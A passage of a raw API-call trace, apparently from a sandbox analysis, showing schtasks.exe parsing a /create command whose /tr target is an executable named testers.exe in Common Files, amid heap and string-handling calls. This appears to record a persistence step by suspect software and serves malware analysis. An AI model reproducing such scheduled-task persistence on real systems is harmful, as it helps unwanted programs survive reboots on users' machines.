_vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|create|") returned 8 [0157.148] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tr|") returned 4 [0157.148] lstrlenW (lpString="|create|") returned 8 [0157.148] lstrlenW (lpString="|tr|") returned 4 [0157.148] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0157.148] SetLastError (dwErrCode=0x490) [0157.148] lstrlenW (lpString="delete") returned 6 [0157.148] lstrlenW (lpString="delete") returned 6 [0157.148] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.148] lstrlenW (lpString="tr") returned 2 [0157.148] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.149] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|delete|") returned 8 [0157.149] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tr|") returned 4 [0157.149] lstrlenW (lpString="|delete|") returned 8 [0157.149] lstrlenW (lpString="|tr|") returned 4 [0157.149] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0157.149] SetLastError (dwErrCode=0x490) [0157.149] lstrlenW (lpString="query") returned 5 [0157.149] lstrlenW (lpString="query") returned 5 [0157.149] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.149] lstrlenW (lpString="tr") returned 2 [0157.149] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.149] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x8, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|query|") returned 7 [0157.149] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tr|") returned 4 [0157.149] lstrlenW (lpString="|query|") returned 7 [0157.149] lstrlenW (lpString="|tr|") returned 4 [0157.149] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0157.149] SetLastError (dwErrCode=0x490) [0157.149] lstrlenW (lpString="change") returned 6 [0157.149] lstrlenW (lpString="change") returned 6 [0157.149] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.149] lstrlenW (lpString="tr") returned 2 [0157.149] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.149] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|change|") returned 8 [0157.149] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tr|") returned 4 [0157.150] lstrlenW (lpString="|change|") returned 8 [0157.150] lstrlenW (lpString="|tr|") returned 4 [0157.150] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0157.150] SetLastError (dwErrCode=0x490) [0157.150] lstrlenW (lpString="run") returned 3 [0157.150] lstrlenW (lpString="run") returned 3 [0157.150] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.150] lstrlenW (lpString="tr") returned 2 [0157.150] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.150] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|run|") returned 5 [0157.150] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tr|") returned 4 [0157.150] lstrlenW (lpString="|run|") returned 5 [0157.150] lstrlenW (lpString="|tr|") returned 4 [0157.150] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0157.150] SetLastError (dwErrCode=0x490) [0157.150] lstrlenW (lpString="end") returned 3 [0157.150] lstrlenW (lpString="end") returned 3 [0157.150] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.150] lstrlenW (lpString="tr") returned 2 [0157.150] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.150] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|end|") returned 5 [0157.150] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tr|") returned 4 [0157.150] lstrlenW (lpString="|end|") returned 5 [0157.150] lstrlenW (lpString="|tr|") returned 4 [0157.150] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0157.151] SetLastError (dwErrCode=0x490) [0157.151] lstrlenW (lpString="showsid") returned 7 [0157.151] lstrlenW (lpString="showsid") returned 7 [0157.151] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.151] lstrlenW (lpString="tr") returned 2 [0157.151] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.151] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0xa, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|showsid|") returned 9 [0157.151] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tr|") returned 4 [0157.151] lstrlenW (lpString="|showsid|") returned 9 [0157.151] lstrlenW (lpString="|tr|") returned 4 [0157.151] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0157.151] SetLastError (dwErrCode=0x490) [0157.151] SetLastError (dwErrCode=0x490) [0157.167] SetLastError (dwErrCode=0x0) [0157.167] lstrlenW (lpString="/tr") returned 3 [0157.167] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0157.167] SetLastError (dwErrCode=0x490) [0157.167] SetLastError (dwErrCode=0x0) [0157.167] lstrlenW (lpString="/tr") returned 3 [0157.167] GetProcessHeap () returned 0x4b0000 [0157.167] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x8) returned 0x4c6998 [0157.167] GetProcessHeap () returned 0x4b0000 [0157.167] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5448 [0157.167] SetLastError (dwErrCode=0x0) [0157.167] SetLastError (dwErrCode=0x0) [0157.167] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.167] lstrlenW (lpString="-/") returned 2 [0157.168] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0157.168] SetLastError (dwErrCode=0x490) [0157.168] SetLastError (dwErrCode=0x490) [0157.168] SetLastError (dwErrCode=0x0) [0157.168] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.168] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\testers.exe", wMatch=0x3a) returned=":\\PROGRA~2\\COMMON~1\\testers.exe" [0157.168] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.168] GetProcessHeap () returned 0x4b0000 [0157.168] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4d40 [0157.168] _memicmp (_Buf1=0x4c4d40, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.168] GetProcessHeap () returned 0x4b0000 [0157.168] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xc) returned 0x4c4d58 [0157.168] GetProcessHeap () returned 0x4b0000 [0157.168] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4d70 [0157.168] _memicmp (_Buf1=0x4c4d70, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.168] GetProcessHeap () returned 0x4b0000 [0157.168] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x46) returned 0x4c69a8 [0157.168] SetLastError (dwErrCode=0x7a) [0157.169] SetLastError (dwErrCode=0x0) [0157.169] SetLastError (dwErrCode=0x0) [0157.169] lstrlenW (lpString="C") returned 1 [0157.169] SetLastError (dwErrCode=0x490) [0157.169] SetLastError (dwErrCode=0x0) [0157.169] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x42) returned 0x4c69f8 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5468 [0157.169] SetLastError (dwErrCode=0x0) [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6968) returned 1 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c6968) returned 0x8 [0157.169] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6968 | out: hHeap=0x4b0000) returned 1 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5348) returned 1 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c5348) returned 0x14 [0157.169] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5348 | out: hHeap=0x4b0000) returned 1 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4cf8) returned 1 [0157.169] GetProcessHeap () returned 0x4b0000 [0157.169] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c4cf8) returned 0x10 [0157.170] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4cf8 | out: hHeap=0x4b0000) returned 1 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5388) returned 1 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c5388) returned 0x14 [0157.170] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5388 | out: hHeap=0x4b0000) returned 1 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6978) returned 1 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c6978) returned 0x8 [0157.170] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6978 | out: hHeap=0x4b0000) returned 1 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c53a8) returned 1 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c53a8) returned 0x14 [0157.170] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c53a8 | out: hHeap=0x4b0000) returned 1 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c53c8) returned 1 [0157.170] GetProcessHeap () returned 0x4b0000 [0157.170] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c53c8) returned 0x16 [0157.171] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c53c8 | out: hHeap=0x4b0000) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c53e8) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c53e8) returned 0x14 [0157.171] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c53e8 | out: hHeap=0x4b0000) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6988) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c6988) returned 0x8 [0157.171] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6988 | out: hHeap=0x4b0000) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5408) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c5408) returned 0x14 [0157.171] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5408 | out: hHeap=0x4b0000) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4d28) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c4d28) returned 0x10 [0157.171] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4d28 | out: hHeap=0x4b0000) returned 1 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.171] GetProcessHeap () returned 0x4b0000 [0157.172] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5428) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c5428) returned 0x14 [0157.172] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5428 | out: hHeap=0x4b0000) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6998) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c6998) returned 0x8 [0157.172] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6998 | out: hHeap=0x4b0000) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5448) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c5448) returned 0x14 [0157.172] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5448 | out: hHeap=0x4b0000) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c69f8) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c69f8) returned 0x42 [0157.172] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c69f8 | out: hHeap=0x4b0000) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.172] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5468) returned 1 [0157.172] GetProcessHeap () returned 0x4b0000 [0157.173] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c5468) returned 0x14 [0157.173] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5468 | out: hHeap=0x4b0000) returned 1 [0157.173] GetProcessHeap () returned 0x4b0000 [0157.173] GetProcessHeap () returned 0x4b0000 [0157.173] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4bd8) returned 1 [0157.173] GetProcessHeap () returned 0x4b0000 [0157.173] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c4bd8) returned 0x10 [0157.173] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4bd8 | out: hHeap=0x4b0000) returned 1 [0157.173] SetLastError (dwErrCode=0x0) [0157.173] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0157.173] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0157.173] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0157.173] VerifyVersionInfoW (in: lpVersionInformation=0x12cca8, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x12cca8) returned 1 [0157.173] SetLastError (dwErrCode=0x0) [0157.173] lstrlenW (lpString="create") returned 6 [0157.173] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0157.173] SetLastError (dwErrCode=0x490) [0157.174] SetLastError (dwErrCode=0x0) [0157.174] lstrlenW (lpString="create") returned 6 [0157.174] GetProcessHeap () returned 0x4b0000 [0157.174] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5468 [0157.174] GetProcessHeap () returned 0x4b0000 [0157.174] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4bd8 [0157.174] _memicmp (_Buf1=0x4c4bd8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.174] GetProcessHeap () returned 0x4b0000 [0157.174] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x16) returned 0x4c5448 [0157.174] SetLastError (dwErrCode=0x0) [0157.174] _memicmp (_Buf1=0x4c4c50, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.174] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c5a90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0157.174] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0157.174] GetProcessHeap () returned 0x4b0000 [0157.174] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x74e) returned 0x4c5ca0 [0157.174] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x4c5ca0 | out: lpData=0x4c5ca0) returned 1 [0157.175] VerQueryValueW (in: pBlock=0x4c5ca0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12cdb0, puLen=0x12cdb4 | out: lplpBuffer=0x12cdb0*=0x4c603c, puLen=0x12cdb4) returned 1 [0157.175] _memicmp (_Buf1=0x4c4c50, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.175] _vsnwprintf (in: _Buffer=0x4c5a90, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x12cd98 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0157.175] VerQueryValueW (in: pBlock=0x4c5ca0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x12cdc0, puLen=0x12cdbc | out: lplpBuffer=0x12cdc0*=0x4c5e68, puLen=0x12cdbc) returned 1 [0157.175] lstrlenW (lpString="schtasks.exe") returned 12 [0157.175] lstrlenW (lpString="schtasks.exe") returned 12 [0157.175] lstrlenW (lpString=".EXE") returned 4 [0157.175] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0157.175] lstrlenW (lpString="schtasks.exe") returned 12 [0157.175] lstrlenW (lpString=".EXE") returned 4 [0157.175] lstrlenW (lpString="schtasks") returned 8 [0157.175] lstrlenW (lpString="/create") returned 7 [0157.175] _memicmp (_Buf1=0x4c4c50, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.175] _vsnwprintf (in: _Buffer=0x4c5a90, _BufferCount=0x19, _Format="%s %s", _ArgList=0x12cd98 | out: _Buffer="schtasks /create") returned 16 [0157.175] _memicmp (_Buf1=0x4c4cb0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.175] GetProcessHeap () returned 0x4b0000 [0157.175] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5428 [0157.175] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.175] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0157.175] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0157.175] GetProcessHeap () returned 0x4b0000 [0157.175] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x30) returned 0x4c6968 [0157.176] _vsnwprintf (in: _Buffer=0x4c6680, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x12cd9c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0157.176] GetProcessHeap () returned 0x4b0000 [0157.176] GetProcessHeap () returned 0x4b0000 [0157.176] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5ca0) returned 1 [0157.176] GetProcessHeap () returned 0x4b0000 [0157.176] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c5ca0) returned 0x74e [0157.176] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5ca0 | out: hHeap=0x4b0000) returned 1 [0157.176] SetLastError (dwErrCode=0x0) [0157.176] GetThreadLocale () returned 0x409 [0157.176] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.176] lstrlenW (lpString="create") returned 6 [0157.176] GetThreadLocale () returned 0x409 [0157.176] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.176] lstrlenW (lpString="?") returned 1 [0157.176] GetThreadLocale () returned 0x409 [0157.176] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.176] lstrlenW (lpString="s") returned 1 [0157.176] GetThreadLocale () returned 0x409 [0157.176] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.176] lstrlenW (lpString="u") returned 1 [0157.176] GetThreadLocale () returned 0x409 [0157.176] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.176] lstrlenW (lpString="p") returned 1 [0157.176] GetThreadLocale () returned 0x409 [0157.176] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.176] lstrlenW (lpString="ru") returned 2 [0157.176] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="rp") returned 2 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="sc") returned 2 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="mo") returned 2 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="d") returned 1 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="m") returned 1 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="i") returned 1 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="tn") returned 2 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="tr") returned 2 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="st") returned 2 [0157.177] GetThreadLocale () returned 0x409 [0157.177] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.177] lstrlenW (lpString="sd") returned 2 [0157.177] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="ed") returned 2 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="it") returned 2 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="et") returned 2 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="k") returned 1 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="du") returned 2 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="ri") returned 2 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="z") returned 1 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="f") returned 1 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="v1") returned 2 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.178] lstrlenW (lpString="xml") 